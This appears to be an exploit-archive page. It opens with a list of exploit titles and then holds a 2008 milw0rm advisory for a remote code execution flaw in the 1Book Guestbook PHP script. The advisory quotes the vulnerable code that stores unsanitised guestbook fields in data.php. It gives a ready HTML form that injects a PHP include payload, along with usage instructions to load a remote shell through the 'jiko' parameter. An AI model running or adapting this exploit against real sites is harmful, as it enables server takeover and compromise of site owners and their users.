477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
62 lines
2.5 KiB
Text
Executable file
62 lines
2.5 KiB
Text
Executable file
=========================================================
|
|
=============== JIKI TEAM [ Maroc And YameN ]===============
|
|
=========================================================
|
|
# Author : jiko
|
|
# email : jalikom@hotmail.fr
|
|
# Home : www.no-back.org & no-exploit.com
|
|
# Script : 1Book Guestbook Script
|
|
# Bug : remote code execution
|
|
# Download : http://1scripts.net/scripts/1book.zip
|
|
=========================JIkI Team===================
|
|
|
|
# if(in_array($_POST['username'], $bannedusers))
|
|
# echo 'Your username has been banned by the administrator.<br/><br/>';
|
|
# if(in_array($_SERVER['REMOTE_ADDR'], $bannedips))
|
|
# echo 'Your IP has been banned by the administrator.<br/><br/>';
|
|
# elseif($_POST['1'] + $_POST['2'] != $_POST['check'])
|
|
# echo('You answered the security question incorrectly.');
|
|
# else
|
|
# {
|
|
# $data = unserialize(file_get_contents('data.php'));
|
|
# array_push($data, array('user' => $_POST['username'], 'date' =>
|
|
mktime(), 'message' => $_POST['message'], 'website' =>
|
|
$_POST['website'], 'ip' => $_SERVER['REMOTE_ADDR']));
|
|
# file_put_contents('data.php', serialize($data));
|
|
# }
|
|
#
|
|
#}
|
|
|
|
#===========================================================================================================================#
|
|
# So, we can write a malicious code like <?php include($jiko); ?> in
|
|
the variable $message, and $username #
|
|
# and then we go in
|
|
http://Site/script/data/data.php?jiko=[shell]
|
|
#
|
|
#===========================================================================================================================#
|
|
simple exploit whith HTML:
|
|
-------------------------
|
|
change site by your site
|
|
+++++++++++++++++++++++++
|
|
|
|
<title> EXploit BY JIKO</title>
|
|
<center>
|
|
<form method="post" action="site/guestbook.php">
|
|
<input type=hidden name=username value="jiko was here" >
|
|
<input type=hidden name=message value="<? include($jiko) ?>" >
|
|
<input type=submit value="send">
|
|
</form>
|
|
<h5>a fter send your usage:
|
|
<br>http://site/scripts/data.php?jiko=[shell]</h5>
|
|
|
|
|
|
=========================================================
|
|
greetz:
|
|
all my friend [kil1er & GhosT HaCkEr & stack ] and H-T Team and all No-back members and tryag.Com
|
|
visit: www.no-back.org & www.tryag.com & no-exploit.com
|
|
=========================================================
|
|
**************************
|
|
hello brother i want chnage my name Jiki Team to JiKo and my email to
|
|
jalikom@hotmail.fr and this a news bug
|
|
remote code execution
|
|
|
|
# milw0rm.com [2008-06-03]
|